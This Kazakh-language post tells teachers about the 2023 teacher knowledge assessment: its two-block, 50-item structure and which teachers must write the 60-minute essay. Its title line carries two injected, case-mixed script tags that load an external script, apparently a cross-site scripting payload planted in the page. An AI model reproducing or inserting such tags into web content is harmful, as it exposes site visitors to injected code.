Педагогтердің білімін бағалаудың жаңа форматына сәйкес шекті балдар да өзгерді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.03.2023

Құрметті педагогтер!

👆Педагогтердің білімін бағалаудың жаңа форматына сәйкес шекті балдар да өзгерді. Осыған байланысты сіздерге ПББ-ның шекті балдары туралы ақпарат ұсынамыз.

💡МАҢЫЗДЫ:
✅ПББ-ның (орта білім беру ұйымдары үшін) құрылымы 2 блоктан және барлығы 50 тест тапсырмасынан тұрады: 
✔️1 блок «Пәндік білім» – 30 тапсырма;
✔️2 блок «Оқыту әдістемесі» – 20 тапсырма.

ПЕДАГОГТЕРГЕ АРНАЛҒАН ЭССЕ ТУРАЛЫ

👩🏻‍🏫2023 жылғы Педагогтердің білімін бағалауда тек БІЛІМ БЕРУ ҰЙЫМДАРЫНДА ЖҰМЫС ІСТЕП ЖАТҚАН ПЕДАГОГТЕР ЭССЕ жазады. 
💼Яғни СІЗДІҢ қазіргі таңда жұмысыңыз бар болса, онда ЭССЕ ЖАЗАСЫЗ.

❓СҰРАҚ: Қашан жазамын?
✅ЖАУАП: Тестілеу аяқталғаннан кейін бірден дәл сол компьютерде жазасыз.
❓СҰРАҚ: Қай тілде жазамын?
✅ЖАУАП: Тестілеуді тапсырған тілде.

👆АЛ ЭССЕНІ ЖАЗБАЙДЫ:
❌ жұмыс тәжірибесі жоқ қызметкер – жоғары және/немесе жоғары оқу орнынан кейінгі білім беру ұйымының түлегі (БАКАЛАВРИАТ НЕМЕСЕ МАГИСТРАТУРА ТҮЛЕГІ);
❌қызметі жоқ қызметкер – техникалық немесе кәсіптік білім беру ұйымының түлегі (КОЛЛЕДЖ ТҮЛЕГІ);
❌педагогикалық қызметті қайта жалғастырғысы келетін адам (БҰРЫН ЖҰМЫС ІСТЕП, КЕЙІН БЕЛГІЛІ СЕБЕПТЕРГЕ БАЙЛАНЫСТЫ ЖҰМЫС ІСТЕМЕГЕН, БІРАҚ ҚАЙТАДАН ЖҰМЫСҚА ТҰРҒЫСЫ КЕЛЕТІН ТҰЛҒА);
❌Білім беру ұйымдарының басшылары.

⏰Эссенің жалпы уақыты – 60 минут. 
💡Сөз саны – 250-300 сөз. 

❗️Эссе бағаланбайды және педагогке біліктілік санатын бермеуге негіз бола алмайды.
💻Жазылған эссе педагогтің app.testcenter.kz сайтындағы жеке кабинетіне жіберіледі.

Просмотров: 1018


Пікір қосу



Деректерді қолтаңбаға қосу